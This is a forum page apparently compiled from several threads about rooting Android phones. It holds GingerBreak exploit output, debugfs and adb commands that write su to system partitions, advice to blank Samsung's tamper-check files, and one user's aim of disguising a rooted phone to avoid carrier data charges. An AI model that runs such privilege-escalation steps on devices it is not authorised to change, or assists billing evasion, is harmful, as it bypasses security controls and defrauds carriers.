Better Mobile App

Rooting XXKG3 (2.3.4) - SuperOneClick won't work

Hello people!
As I'm fairly new to the whole android scene I'm having trouble understanding how I'm supposed to re-root my Galaxy S 2 after updating it to the most recent firmware. I do not want to replace the ROM at all as I'm quite content with the stock ROM and want to avoid random force closes/missing features, which is what I got in the last couple of custom ROMs.
I just want it rooted so that I can remove the bloatware Samsung bundle with the phone, and also to customise the usability of the phone (bootscreen, CRT effect, improved/silent camera etc).
However when using SuperOneClick 2.0 Beta 1 to try and root it, I get as far as:
SuperOneClick v2.0.0.0
Checking drivers…
Killing ADB Server…
OK
Starting ADB Server…
* daemon not running. starting it now on port 5037 *
* daemon started successfully *
OK
Waiting for device…
OK
2.3.4
Getting manufacturer…
HTC
OK
Getting model…
Nexus One
OK
Getting version…
85805
OK
Checking if rooted…
False
OK
Rooting device… – Step #1
OK
Rooting device… – Step #2
OK
Rooting device… – Step #3
684 KB/s (16830 bytes in 0.024s)
OK
Rooting device… – Step #4
OK
Rooting device… – Step #5
$ cd /data/local/tmp/
$ ./GingerBreak
[**] Gingerbreak/Honeybomb — android 2.[2,3], 3.0 softbreak
[**] (C) 2010-2011 The Android Exploid Crew. All rights reserved.
[**] Kudos to jenzi, the #brownpants-party, the Open Source folks,
[**] Zynamics for ARM skills and Onkel Budi
[**] donate to (email) if you like
[**] Exploit may take a while!
[+] Plain Gingerbread mode!
[+] Found PT_DYNAMIC of size 232 (29 entries)
[+] Found GOT: 0×00014344
[+] Using device /devices/platform/goldfish_mmc.0
[*] vold: 0000 GOT start: 0×00014344 GOT end: 0×00014384
￿
OK
Rooting device… – Step #6
OK
Rooting device… – Step #7
OK
Installing BusyBox (temporary)… – Step #1
1186 KB/s (1062992 bytes in 0.875s)
OK
Installing BusyBox (temporary)… – Step #2
OK
Getting mount path…
/dev/block/mtdblock3
OK
Remounting /system with read-write access…
mount: Operation not permitted
FAILED
I have tried search other topics and they mention having to reflash with an unofficial ROM, but not really linking to which one, and I'm not sure if it's retaining the stock ROM in the way I want it to (aka, untouched, just rooted so I can customise it myself).
Any assistance would be greatly appreciated!

You have to flash at least an insecure kernel for SuperOneClick to work on the SGS2.
You can also flash a kernel that takes care of all the rooting, like CF-Root or maybe even mine
Don't confuse this with flashing a complete custom ROM, it's only the kernel, but that one needs to be flashed in order to root.

Removed my post here as I found a kernal to use when I get home.
Thank you very much for the clarifications given.

Galaxy S III adb shell error

I was looking up the partition layout of the Galaxy S III while I stumbled upon this problem.
The first time you run a command in 'adb shell' everything is fine, but when you try to run a second command, it just hangs. It doesn't crash, it just hangs.
So, I tried to find out what could be wrong, by doing the following: Instead of going into the shell itself, I just entered a semi-random command 'adb shell mount', which returned the normal result.
Then, I typed 'adb shell' and guess what? It returns a commonly known error: 'error: protocol fault (status 72 6f 6f 74?!)'
The status code is HEX, which translates to: 'error: protocol fault (status root?!)'
So I suppose this has something to do with the fact that my SGS3 is rooted.
I don't feel like unrooting it, but if someone would be so kind to test this on an unrooted SGS3 and report back the results here so we can investigate this further that would be greatly appreciated.

it works without any error.
do you know what to backup which contains kernel and ramdisk ?

Mine is rooted, with Omega Rom V3 and everything works perfect with adb.

Cranck said:
Mine is rooted, with Omega Rom V3 and everything works perfect with adb.
Click to expand...
Click to collapse
Have you tried multiple shell commands? I know adb functions, but it's about using adb shell.
I'm on the stock rom, rooted manually with CF's insecure kernel by the way.

I'm not sure this is related, but there is some very suspicious new functionality in the FactoryTest.apk, called "SysScope". Its some kind of service checking and verifying the authenticity of "something". But I have no idea of what, only that a related java file (ResultCode.class [sysscope.service] contain the following code segment:
Code:
[SIZE=2] arrayOfResultCode[0] = OK;
arrayOfResultCode[1] = ADB_RUNNING_AS_ROOT;
arrayOfResultCode[2] = PARTITION_TAMPERED;
arrayOfResultCode[3] = ROOT_PROCESS_FOUND;
arrayOfResultCode[4] = DANGEROUS_FILE_DETECTED;
arrayOfResultCode[5] = NOT_OFFICIAL_BINARY;
[/SIZE]
Then it looks for SysScope files in the SysScopeVerifyer.class like this:
Code:
[SIZE=2]/data/app/com.sec.android.app.sysscope-1.apk
/data/app/com.sec.android.app.sysscope-2.apk[/SIZE]
I suggest you to back these up, and then replace them, with empty files of the same name, and see what happens.

I have the exact same problem on the GS2, OneX, and OneS. I have no problem shelling into the devices using another system, but on one of my computers I have the same issue. Windows 7 64bit with jdk7 installed.
Also, I enabled adb trace to see what was being returned: set ADB_TRACE=all
-Entering ls three times on the OneX, the first time works correctly
Code:
ls
system/core/adb/commandline.c::stdin_read_thread():stdin_read_thread(): post uni
x_read(fdi=0,...)
system/core/adb/commandline.c::stdin_read_thread():stdin_read_thread(): pre unix
_read(fdi=0,...)
system/core/adb/commandline.c::read_and_dump():read_and_dump(): post adb_read(fd
=101): len=5
ls
system/core/adb/commandline.c::read_and_dump():read_and_dump(): pre adb_read(fd=
101)
system/core/adb/commandline.c::read_and_dump():read_and_dump(): post adb_read(fd
=101): len=32
acct
cache
config
cwkeys
d
system/core/adb/commandline.c::read_and_dump():read_and_dump(): pre adb_read(fd=
101)
system/core/adb/commandline.c::read_and_dump():read_and_dump(): post adb_read(fd
=101): len=318
data
default.prop
dev
devlog
etc
firmware_dsps
firmware_q6
firmware_radio
firmware_wcnss
init
init.elite.rc
init.goldfish.rc
init.qcom.rc
init.qcom.sh
init.rc
init.target.rc
init.usb.rc
mnt
proc
root
sbin
sdcard
sys
system
tombstones
ueventd.goldfish.rc
ueventd.rc
vendor
[email protected]:/ $ system/core/adb/commandline.c::read_and_dump():read_and_dump()
: pre adb_read(fd=101)
ls
system/core/adb/commandline.c::stdin_read_thread():stdin_read_thread(): post uni
x_read(fdi=0,...)
system/core/adb/commandline.c::stdin_read_thread():stdin_read_thread(): pre unix
_read(fdi=0,...)
ls
system/core/adb/commandline.c::stdin_read_thread():stdin_read_thread(): post uni
x_read(fdi=0,...)
system/core/adb/commandline.c::stdin_read_thread():stdin_read_thread(): pre unix
_read(fdi=0,...)

[ROOT][TOOL]Debugfs automated root [09/18/2012]

This tool will root your device based on the debugfs root method developed by miloj.
Just download and unzip everything into a directory; then run RootDebugfs.bat from that directory (if you do not currently have the device drivers for your transformer, they are attached to this post, please install them, please use them to install your device before attempting the process).
Neither ADB nor the SDK need to be installed as all needed files are included in the attachments below (though it won't hurt anything if they are).
Helpful tip:
Make sure no other Android device is connected to your PC
It should look familiar since I took PrimeTime and gutted it, only keeping the menu options. Thanks to viperboy for that.
Original post is in the TF300 thread, http://forum.xda-developers.com/showthread.php?t=1704209
UPDATE 6/12/2012:
v1.1 - Added donation link for miloj
v1.2 - Fixed bug that caused it to stop while doing "debugfs", to cancel press Ctrl+c
v1.3 - Fixed bug where the id is not returned from the su test
v1.4 - Fixed bug introduced with v1.3
v1.5 - Fixed bug where you don't have to push the apk before calling install
6/13/2012
v1.6 - Fixed messaging (this is a cosmetic change)
v1.7 - Added a remove call on su prior to rooting for those who had root previously and it not longer works
v1.8 - Change the octal permissions to be 6755 instead of 4755
7/2/2012
v1.9 - Update superuser app and binary to the latest version available
XDA uploads are not working currently so I have uploaded the new version to here for now
https://skydrive.live.com/redir?resid=DC89975E3CE960E5!221
8/5/2012
v2.0 - Updated to include a kill for Asus sync as that seemed to be the biggest issue.
I have also made it more generic so that it can root more devices with the same util. This is done by scanning for the system partition automatically, thanks to rightonred for that suggestion. With the attachment labeled "generic" I have removed all asus references and drivers since they were causing issues with me being able to attach the zip to xda. Anybody who needs the drivers can download them from asus or from another xda post.
v2.1 - Added a pause while waiting for the device to restart to alleviate that nuisance.
v2.2 - Added message to ignore "File not found" message when trying to delete old su versions. Also updated message with the generic locations of settings on the tablet.
8/12/2012
v2.3 - Update su binary file (hopefully it may help some of the people with superuser app issues)
ASUS drivers can be downloaded from the ASUS site but some are not provided other than through the sync install. I have extracted out the drivers from that sync install and attached them to this post. These drivers will support most of the Asus Eee Pad family including TF101, TF201, TF300, TF700, ME171(MeMO), A66(Padfone), SL101(Slider), and a couple others.
No longer need a PadFone specific root util as the generic one should work for it as well.
Here is a version I put together for the Gallexy SII (but the generic one attached here should work fine)
http://forum.xda-developers.com/showpost.php?p=27611187&postcount=3

Latest Supported Versions:
v9.2.1.27 for the TF101 (ICS 4.0.3)
v9.2.2.6 for the TF101G (ICS 4.0.3) (3G version)
v9.4.2.28 for the TF201 (ICS 4.0.3)
v9.4.3.30 for the TF300T (ICS 4.0.3)
v9.4.4.40 for the TF300TG (ICS 4.0.3) (3G version)
v9.4.5.30 for the TF700T (ICS 4.0.3)
v9.18.8.41 for the PadFone (ICS 4.0.3)
These are the latest supported versions as far as I know, if I get any further input I will update this post.
Reported UNsupported Versions
v10.4.2.15 for the TF201 (JB 4.1.1)
v10.4.2.9 for the TF300T (JB 4.1.1)
v10.4.4.16 for the TF700T (JB 4.1.1)
v9.20.1.22 for the PadFone (ICS 4.0.4)

any one confirmed? what's the risk, if it doesnt work?

Currently in progress .... sitting at:
Step 2 - Rooting...
debugfs 1.42 (29-Nov-2011)
debugfs: (shows a flashing cursor)
My Prime has rebooted but still sitting at the above. Is this normal?
OK, now I'm getting nervous .... Anybody wanna help a Noob?

Aaronneal said:
any one confirmed? what's the risk, if it doesnt work?
Click to expand...
Click to collapse
The risk if it doesn't would should just be that you wouldn't have root.
We already have confirmation that the method works (so there should be no risk there). We just don't have confirmation that I didn't make a typo or other mistake when putting it all together.

Gremlin001 said:
Currently in progress .... sitting at:
Step 2 - Rooting...
debugfs 1.42 (29-Nov-2011)
debugfs: (shows a flashing cursor)
My Prime has rebooted but still sitting at the above. Is this normal?
Click to expand...
Click to collapse
How long has it been sitting there?
This is one of the points where I wasn't sure about since I had to pass input to debugfs through adb.

sparkym3 said:
How long has it been sitting there?
This is one of the points where I wasn't sure about since I had to pass input to debugfs through adb.
Click to expand...
Click to collapse
Currently 7 minutes...
If my memory serves me correctly, this is the point where it can take 10 - 15 minutes. Is that correct?
---------- Post added at 01:27 PM ---------- Previous post was at 01:12 PM ----------
Nope ... left it stalled at "debugfs:" for 20 minutes.
Ctrl-C'd out of the batch file. Doesn't seem to have hurt the Prime.

Gremlin001 said:
Currently 7 minutes...
If my memory serves me correctly, this is the point where it can take 10 - 15 minutes. Is that correct?
---------- Post added at 01:27 PM ---------- Previous post was at 01:12 PM ----------
Nope ... left it stalled at "debugfs:" for 20 minutes.
Ctrl-C'd out of the batch file. Doesn't seem to have hurt the Prime.
Click to expand...
Click to collapse
Thats what I was going to tell you. I have an update that I will put up. just forgot to put the absolute location. Please stand by.

Standing by ...
Now?
Now?
How 'bout now??
Maybe now?

Please try again. New version is v1.2

Running the updated bat as I type.... stand by
update #1 - sitting at the same spot.
Is it possible some of the files in the zip need to be in the MS-Win system32 folder?

sparkym3- you have a quick link to the win driver installation tutorial? Gonna try this but haven't used Windows in years. Got a lappy with xp on it.

texstar said:
sparkym3- you have a quick link to the win driver installation tutorial? Gonna try this but haven't used Windows in years. Got a lappy with xp on it.
Click to expand...
Click to collapse
Plug your prime into the computer with the Asus usb cable. When the Autoinstall drivers dialogue pops up, tell it you want to select the drivers. when it asks you to browse to the drivers, browse to the location where you unzipped sparky's and select it. WinXP does the rest.

Gremlin001 said:
Running the updated bat as I type.... stand by
update #1 - sitting at the same spot.
Is it possible some of the files in the zip need to be in the MS-Win system32 folder?
Click to expand...
Click to collapse
Can you tell me what the console displays after these lines. That should tell if all the files got copied over to the device.
adb push debugfs /data/local/
adb push debugfsinput /data/local/
Since debugfs actually runs, at least that one is copied over, my main concern is debugfsinput, this is the file that tells debugfs what to do.
Also, would you post a screenshot so I can see exactly what is happening, something might jump out if I can actually see it.

Screen shot won't do any good. Lettering is very dark. Here is a select all/copy of the output.
Waiting for device to be detected...
* daemon not running. starting it now on port 5037 *
* daemon started successfully *
Step 1 - Pushing files...
843 KB/s (1862336 bytes in 2.156s)
698 KB/s (22364 bytes in 0.031s)
7 KB/s (119 bytes in 0.015s)
Rebooting...
Step 2 - Rooting...
debugfs 1.42 (29-Nov-2011)
debugfs:
I'm exiting the batch file.

Gremlin001 said:
Screen shot won't do any good. Lettering is very dark. Here is a select all/copy of the output.
Waiting for device to be detected...
* daemon not running. starting it now on port 5037 *
* daemon started successfully *
Step 1 - Pushing files...
843 KB/s (1862336 bytes in 2.156s)
698 KB/s (22364 bytes in 0.031s)
7 KB/s (119 bytes in 0.015s)
Rebooting...
Step 2 - Rooting...
debugfs 1.42 (29-Nov-2011)
debugfs:
I'm exiting the batch file.
Click to expand...
Click to collapse
Would you just run this line manually and see if you get the same.
adb shell "/data/local/debugfs -w /dev/block/mmcblk0p1 < /data/local/debugfsinput"
I wish I had my prime i could test, all i have with me is an emulator.
On the emulator i get errors, but it still runs the correct commands then exits
C:\Android\android-sdk\platform-tools>adb shell "/data/local/debugfs -w /dev/block/mmcblk0p1 < /data/local/debugfsinput"
debugfs 1.42 (29-Nov-2011)
/dev/block/mtdblock0: Attempt to read block from filesystem resulted in short read while opening filesystem
debugfs: cd: Filesystem not open
debugfs: write: Filesystem not open
debugfs: set_inode_field: Filesystem not open
debugfs: set_inode_field: Filesystem not open
debugfs: set_inode_field: Filesystem not open
debugfs:
C:\Android\android-sdk\platform-tools>

C:\Documents and Settings\kcr\Desktop\Root>adb shell "/data/local/debugfs -w /de
v/block/mmcblk0p1 < /data/local/debugfsinput"
debugfs 1.42 (29-Nov-2011)
debugfs: debugfs: write: The file 'su' already exists
debugfs: debugfs: debugfs: debugfs:
C:\Documents and Settings\kcr\Desktop\Root>
Then it exits to dos shell
---------- Post added at 02:22 PM ---------- Previous post was at 02:14 PM ----------
Gotta run sparky. I'll be back to try again in about 4 hours. Thanks for giving it a go and setting up the bat. It will likely be something simple messing up - it usually is.

Gremlin001 said:
C:\Documents and Settings\kcr\Desktop\Root>adb shell "/data/local/debugfs -w /de
v/block/mmcblk0p1 < /data/local/debugfsinput"
debugfs 1.42 (29-Nov-2011)
debugfs: debugfs: write: The file 'su' already exists
debugfs: debugfs: debugfs: debugfs:
C:\Documents and Settings\kcr\Desktop\Root>
Then it exits to dos shell
Click to expand...
Click to collapse
if the file already exists, then that may be a problem.
you could try this to remove the existing file:
Code:
adb shell
/data/local/debugfs -w /dev/block/mmcblk0p1
rm /xbin/su
quit
exit
This should clear out any current su file that's in there and then try that line again.
Hopefully somebody else can come in and confirm they are seeing the same because I am useless for trying things without my device.

sparkym3 said:
Latest Supported Versions:
v9.4.2.21 for the TF201
v9.2.1.17 for the TF101
v9.4.3.29 for the TF300
These are the latest supported versions as far as I know, if I get any further input I will update this post.
The latest update for TF201 v9.4.2.28/29 due out within a day or 2 has been reported to not have any of the known root exploits, do NOT upgrade to the latest build prior to rooting or you may be out of luck.
Click to expand...
Click to collapse
I'm already out of luck
so i can't even downgrade either, if I wanted to, huh? .28 blues..lol

Ok I'm in if you are still around sparkym3.
Running v1.3 bat gets me to...
Step 2 -- Rooting...
debugfs 1.42
debugfs: Allocated inode: 1369
debugfs: su: File not found by ext2_loopback
debugfs: su: File not found by ext2_loopback
debugfs: su: File not found by ext2_loopback
debugfs:
Rebooting...
Testing superuser...
/system/bin/sh: /system/xbin/su: not found
uid and gid should both be 0.
Are they? (y/n):
I'm stopped here. not sure how to proceed.

[Q] Rooting the Fusion 2

Can anyone advise if the Huawei-U8665 (At&T Fusion 2) can be rooted? It has Android version 2.3.6. I tried with the easy OneSuperClick approach but didn't work-wouldn't recognize device. Thanks.

ptbear said:
Can anyone advise if the Huawei-U8665 (At&T Fusion 2) can be rooted? It has Android version 2.3.6. I tried with the easy OneSuperClick approach but didn't work-wouldn't recognize device. Thanks.
Click to expand...
Click to collapse
Did you ever figure out how to root?

Why don't you Google search other huawei devices and look for root kit running Gingerbread
Sent from my LGL35G using xda premium

903tex said:
Why don't you Google search other huawei devices and look for root kit running Gingerbread
Sent from my LGL35G using xda premium
Click to expand...
Click to collapse
I have, and I haven't been able to find anything. Superoneclick, z4root and unlock root only work for 2.3 and the Fusion 2 is running 2.3.6 and while trying to use those tools to root, it always hangs when trying to gain shell root.

Have to wait til somebody with skills makes a exploit for the fusion.
Sent from my LGL35G using xda premium

Patience is a virtue I supposed. I should've just bought a galaxy player I guess.

I seem to have acquired root, but I had to use fastboot to restore the rom. Sry i cant be more specific because tthis touchscreen took a hard fall..... post later thx -RFE

RFE said:
I seem to have acquired root, but I had to use fastboot to restore the rom. Sry i cant be more specific because tthis touchscreen took a hard fall..... post later thx -RFE
Click to expand...
Click to collapse
i keep posting to the wrong threas. sry
hint hint....... u need the diag drivers which are not posted but i should have a recovery img ready soon (one that re-installs SU on each boot

RFE said:
i keep posting to the wrong threas. sry
hint hint....... u need the diag drivers which are not posted but i should have a recovery img ready soon (one that re-installs SU on each boot
Click to expand...
Click to collapse
these are the right drivers for adb

RFE said:
these are the right drivers for adb
Click to expand...
Click to collapse
hi guys, here is a copy of the latest and greatest adb driver sets. with this driver set (folder called 'Driver' if you don't need adb).
I now HAVE ROOT on the phone by using fastboot and modifying the recovery image. I will post these once I strip it of all my personal info. Please try your own methods as well. I have attached a screenshot of what your (x86) device manager should look like once you correctly installed the drivers.
Best wishes & happy rooting

RFE said:
hi guys, here is a copy of the latest and greatest adb driver sets. with this driver set (folder called 'Driver' if you don't need adb).
I now HAVE ROOT on the phone by using fastboot and modifying the recovery image. I will post these once I strip it of all my personal info. Please try your own methods as well. I have attached a screenshot of what your (x86) device manager should look like once you correctly installed the drivers.
Best wishes & happy rooting
Click to expand...
Click to collapse
Here is a clip of adb working. I am trying to get clockworkmod working, but it is difficult because of all this new 2.3.6 securiy (my last phone was a 2.3.4)
D:\android-sdk-windows\platform-tools>adb tcpip 8888
restarting in TCP mode port: 8888
D:\android-sdk-windows\platform-tools>adb root
error: device not found
D:\android-sdk-windows\platform-tools>adb usb
error: device not found
D:\android-sdk-windows\platform-tools>adb get-state
unknown
D:\android-sdk-windows\platform-tools>adb shell
$ exit
exit
D:\android-sdk-windows\platform-tools>adb reboot-bootloader
* daemon not running. starting it now on port 5037 *
* daemon started successfully *
D:\android-sdk-windows\platform-tools>adb root
adbd cannot run as root in production builds
(you must copy certain files to the device via adb push/pull & you can have root too)
---------- Post added at 04:14 PM ---------- Previous post was at 03:46 PM ----------
I dumped the entire phone in user mode and this is what you get:
(let me know if you need anything)
Device connected.
Default pull path saved.
Detailed phone info: RECOVERY ACTIVE
Pulling file or directory from data/app/... successful.
Pulling file or directory from data/app_private/... failed.
Pulling file or directory from data/data/... successful.
Pulling file or directory from data/local/... successful.
Pulling file or directory from data/nv/... failed.
Pulling file or directory from data/system/... successful.
Pulling file or directory from system/app/... failed.
Pulling file or directory from system/bin/... successful.
Pulling file or directory from system/etc/init.d/... failed.
Pulling file or directory from system/fonts/... successful.
Pulling file or directory from system/framework/... successful.
Pulling file or directory from system/media/... successful.
Pulling file or directory from system/usr/keylayout/... successful.
\android-sdk-windows\f2pull1
05 <DIR> .
05 <DIR> ..
56 1,697 7k_handset.kl
56 3,894 7x27a_kp.kl
43,652 abtfilt
51 0 accounts.db-journal
55,168 akmd8962
55,168 akmd8975
191 am
313 am.jar
27,864 am.odex
5,520 amploader
313 android.policy.jar
248,448 android.policy.odex
313 android.test.runner.jar
193,944 android.test.runner.odex
58,132 applypatch
5,720 app_process
71,736 ast-mm-vdec-omx-test7k
17,076 ATFWD-daemon
24,064 athtestcmd
631,588 ath_supplicant
<DIR> audio
56 245 AVRCP.kl
5,504 battery_charging
5,292 bluetoothd
199 bmgr
313 bmgr.jar
13,784 bmgr.odex
23,208 bootanimation
23,192 bootanimationex
313 bouncycastle.jar
778,624 bouncycastle.odex
10,196 brcm_patchram_plus
33,428 bridgemgrd
380,435 btld
5,556 bugreport
5,360 callife
145,156 charge
14,404 CKPD-daemon
6,880 Clockopia.ttf
22,788 cnd
313 com.android.location.provider.jar
7,352 com.android.location.provider.odex
1,671 com.cequint.platform.jar
1,984 com.cequint.platform.odex
313 com.google.android.maps.jar
388,168 com.google.android.maps.odex
313 com.qualcomm.location.vzw_library.jar
46,000 com.qualcomm.location.vzw_library.odex
120,332 compassd
313 core-junit.jar
23,952 core-junit.odex
22,926 core.jar
4,801,784 core.odex
5,520 dalvikvm
109,504 dbus-daemon
18,112 debuggerd
9,796 dexopt
44,612 dhcpcd
102,056 dhd
5,648 diag_klog
5,568 diag_mdlog
108,820 dnsmasq
194,488 DroidSans-Bold.ttf
190,776 DroidSans.ttf
35,880 DroidSansArabic.ttf
3,725,920 DroidSansFallback.ttf
23,076 DroidSansHebrew.ttf
119,380 DroidSansMono.ttf
36,028 DroidSansThai.ttf
185,228 DroidSerif-Bold.ttf
190,304 DroidSerif-BoldItalic.ttf
177,560 DroidSerif-Italic.ttf
172,916 DroidSerif-Regular.ttf
56,468 ds_fmc_appd
34,544 dumpstate
9,812 dumpsys
5,548 dvz
204,900 e2fsck
313 ext.jar
1,393,000 ext.odex
06 60,920,794 fastboot-tools-full-copy-HUAWEI-U8665-EN-NONIG
rar
9,968 filebackup
14,084 fmconfig
360,282 framework-res-hwext.apk
10,368,022 framework-res.apk
12,413 framework.jar
9,007,376 framework.odex
22,640 fsck_msdos
35,028 ftmdaemon
5,604 gzip
27,652 hciattach
5,684 hci_dev_state
277,652 hostapd
22,420 hostapd_cli
5,440 hostapd_wps
9,920 hwvefs
194 ime
313 ime.jar
6,720 ime.odex
201 input
313 input.jar
4,408 input.odex
18,324 installd
133,556 ip
36,052 iperf
216,188 ipth_dua
313 javax.obex.jar
60,848 javax.obex.odex
10,112 keystore
9,692 kmsgcat
39,416 linker
13,952 load_oemlogo
44,484 loc_api_app
14,052 logcat
9,760 logwrapper
5,504 mediaserver
17,408 mm-abl-daemon
13,184 mm-abl-test
18,092 mm-adec-omxaac-test
22,156 mm-adec-omxadpcm-test
22,172 mm-adec-omxamr-test
22,288 mm-adec-omxamrwb-test
22,236 mm-adec-omxevrc-hw-test
26,172 mm-adec-omxmp3-test
22,236 mm-adec-omxQcelpHw-test
22,268 mm-adec-omxvam-test
22,204 mm-adec-omxwma-test
5,532 mm-adspsvc-test
18,108 mm-aenc-omxaac-test
13,852 mm-aenc-omxamr-test
18,252 mm-aenc-omxevrc-test
18,252 mm-aenc-omxqcelp13-test
5,408 mm-audio-alsa-test
15,996 mm-audio-ctrl-test
5,552 mm-audio-mvs-test
88,820 mm-audio-native-test
22,188 mm-jpeg-dec-test
18,096 mm-jpeg-enc-test
5,456 mm-qcamera-daemon
62,308 mm-qcamera-test
10,652 mm-qcamera-testsuite-client
26,464 mm-vdec-omx-test
63,620 mm-venc-omx-test
9,800 modempre
205 monkey
313 monkey.jar
89,864 monkey.odex
18,308 mtpd
5,552 ndc
5,660 netcfg
47,764 netd
76,324 netmgrd
5,520 nl_listener
5,376 oeminfo_test
5,584 oem_rpc_svc
32,616 omx_tests
51 6,374 packages.list
51 111,973 packages.xml
18,692 pand
18,112 pcm-bridge
67,860 pcscd
524,288 Phonesky.apk
2,870,672 Phonesky.odex
11,032 PicoTts.apk
12,640 PicoTts.odex
26,720 ping
5,540 PktRspTest
6,916,572 PlusOne.apk
5,932,352 PlusOne.odex
191 pm
313 pm.jar
28,392 pm.odex
3,757,662 pops_atnt.apk
1,511,304 pops_atnt.odex
18,096 port-bridge
700,557 PotterUnlock.apk
77,128 PotterUnlock.odex
139,540 pppd
56,764 ProjectMenuAct.apk
94,408 ProjectMenuAct.odex
313 qcnvitems.jar
125,648 qcnvitems.odex
313 qcrilhook.jar
12,544 qcrilhook.odex
86,836 qmiproxy
33,652 qmuxd
9,760 qrngd
5,564 qrngtest
56 1,950 qwerty.kl
56 2,601 qwerty_m660.kl
142,516 racoon
26,252 radish
57,140 recEvent
9,856 rild
5,588 rmt_oeminfo
10,220 rmt_storage
59,832 run-as
5,392 schedtest
9,748 sdcard
42,404 sdptool
9,860 service
9,956 servicemanager
313 services.jar
1,732,544 services.odex
6,792,432 Settings.apk
883,048 Settings.odex
33,309 SettingsProvider.apk
65,176 SettingsProvider.odex
974,859 SetupWizard.apk
92,928 SetupWizard.odex
82,840 sh
15,014 ShopMusic.apk
3,264 ShopMusic.odex
23,176 shutdownanima
9,828 sleeplogcat
3,858 SmartcardService.apk
28,064 SmartcardService.odex
1,704,489 SoundRecorder.apk
54,480 SoundRecorder.odex
313 sqlite-jdbc.jar
147,632 sqlite-jdbc.odex
81,284 Stk.apk
67,312 Stk.odex
153,434 Street.apk
323,656 Street.odex
5,456 surfaceflinger
56 1,999 surf_keypad.kl
192 svc
313 svc.jar
8,400 svc.odex
10,239,938 Swype.apk
647,512 Swype.odex
609,667 SystemUI.apk
191,344 SystemUI.odex
5,472 system_server
811,688 Talk.apk
514,136 Talk.odex
35,024 TaskManager.apk
20,472 TaskManager.odex
19,817 TelephonyProvider.apk
165,968 TelephonyProvider.odex
30,452 testpcsc
35,268 test_diag
3,444,531 tn70-android-att-7121044.apk
2,756,552 tn70-android-att-7121044.odex
81,544 toolbox
559,282 ToolBox.apk
24,400 ToolBox.odex
15,030 TtsService.apk
37,544 TtsService.odex
51 58 uiderrors.txt
1,580,748 UNO_DEMO_HUAWEI_U8665_EN_NONIGP_ATT_TS_102.apk
552,136 UNO_DEMO_HUAWEI_U8665_EN_NONIGP_ATT_TS_102.ode
5,440 usbhub
5,520 usbhub_init
13,689 UserDictionaryProvider.apk
16,504 UserDictionaryProvider.odex
27,284 v4l2-qcamera-app
5,552 vdc
1,125,753 Videos.apk
1,392,992 Videos.odex
3,171,658 vlingo.apk
2,772,800 vlingo.odex
91,893 VoiceDialer.apk
87,256 VoiceDialer.odex
1,485,636 VoiceSearch.apk
2,391,016 VoiceSearch.odex
64,100 vold
19,377 VpnServices.apk
32,648 VpnServices.odex
9,792 wiperiface_v01
109,465 WISPr_57_Android22_prepaid.apk
66,824 WISPr_57_Android22_prepaid.odex
9,732 wlan_detect
10,416 wlan_tool
408,520 wl_4330
92,564 wmiconfig
31,284 wpa_cli
372,356 wpa_supplicant
1,937,546 YouTube.apk
1,660,664 YouTube.odex
1,973,436 YPMAndroid-release_preload3_6_2990.apk
1,531,032 YPMAndroid-release_preload3_6_2990.odex
282 File(s) 178,328,187 bytes
Click to expand...
Click to collapse

GOT ROOT? Fusion 2 finally rooted!
RFE said:
hi guys, here is a copy of the latest and greatest adb driver sets. with this driver set (folder called 'Driver' if you don't need adb).
I now HAVE ROOT on the phone by using fastboot and modifying the recovery image. I will post these once I strip it of all my personal info. Please try your own methods as well. I have attached a screenshot of what your (x86) device manager should look like once you correctly installed the drivers.
Best wishes & happy rooting
Click to expand...
Click to collapse
Here is the superuser binary along with a working adb packaged together. Just push the apk to the phone once you have the drivers installed.
I shouldn't have to spell it out for you how to apply this root kit.
Enjoy and don't abuse!
>adb wait-for-device
adb server is out of date. killing...
* daemon started successfully *
>adb shell mount -o rw,remount rootfs /
>adb shell busybox --install -s /vendor/bin
>adb install ./Lib/Superuser.apk
2458 KB/s (196640 bytes in 0.078s)
pkg: /data/local/tmp/Superuser.apk
Success

Looking for the rar password
Thanks for posting, however its asking for a password.
RFE said:
Here is the superuser binary along with a working adb packaged together. Just push the apk to the phone once you have the drivers installed.
I shouldn't have to spell it out for you how to apply this root kit.
Enjoy and don't abuse!
>adb wait-for-device
adb server is out of date. killing...
* daemon started successfully *
>adb shell mount -o rw,remount rootfs /
>adb shell busybox --install -s /vendor/bin
>adb install ./Lib/Superuser.apk
2458 KB/s (196640 bytes in 0.078s)
pkg: /data/local/tmp/Superuser.apk
Success
Click to expand...
Click to collapse

Rar Password?
Will you either release the rar password or post and non encrypted link please?

I thought I mentioned the password is xda-developers.com ... something easy to overlook if you are skimming the forums.
EDIT: attached recovery image

RFE said:
I thought I mentioned the password is xda-developers.com ... something easy to overlook if you are skimming the forums.
EDIT: attached recovery image
Click to expand...
Click to collapse
I got this phone for my daughter and wanted to root to make it seem like an ordinary phone to AT&T. That way they won't charge me for having a smart phone. Anyway, it doesn't seem a lot of folks are rooting the Fusion 2. How has yours behaved since you've rooted? Any problems?

Spurs_Redskins said:
I got this phone for my daughter and wanted to root to make it seem like an ordinary phone to AT&T. That way they won't charge me for having a smart phone. Anyway, it doesn't seem a lot of folks are rooting the Fusion 2. How has yours behaved since you've rooted? Any problems?
Click to expand...
Click to collapse
Even if out root it that won't stop att from seeing it as a smart phone
Batcom2

Whenever I try to push the Superuser.apk into the Fusion 2, it keeps saying that
Code:
"failed to copy 'superuser.apk' : read-only file system

Okay, so I've obtained root, but I bricked my phone using Rom Toolbox Pro. Can someone please backup their /system folder, so I may try to unbrick my device?
Sent from my NookColor using xda app-developers app

yup im a friggin moron flashed that recovery.img to my system out of habit ended up bricking mine too. can someone please upload a stock system.img as well as the original recovery so i can attempt to unbrick this beast I was trying to root for a friend. all I get to is first white at&t screen and it freezes almost like stuck in fastboot mode
can someone help and rip/upload or do I have ne other options?

[help] ratel cell r1020 rooting

Hello,
I have a device called RATEL CELL R1020 with OS android 8.0 oreo.
I tried some applications for rooting this smartphone like kingroot, kingoroot, etc but failed. This device can't unlock bootloader, so I see rooting with exploit in youtube like thomasking. Please anyone here help me to rooting my smartphone?
4.4.78perf+ kernel
this attachment is screenshot of the system
Thankyou

j4nn said:
@arifincaesar, do you have your phone's firmware in a downloadable form? Can you obtain linux kernel source code for your phone?
I could imagine adapting this (exploit source code here) for your phone, but the kernel binary that is running on the phone is a must pre-requisite. Obviously it would be only a temp root.
Click to expand...
Click to collapse
arifincaesar said:
there is no way to get firmware of this phone sir..
and there's no way to unlock bootloader..
i think the only way to backup firmware this device is exploit and getting root access without ubl..
there is just said 4.4.78-perf+
Click to expand...
Click to collapse
In my opinion, there is no exploit that would not need offsets within kernel image in advance.
Because of that you need a copy of kernel binary that is running on the phone.
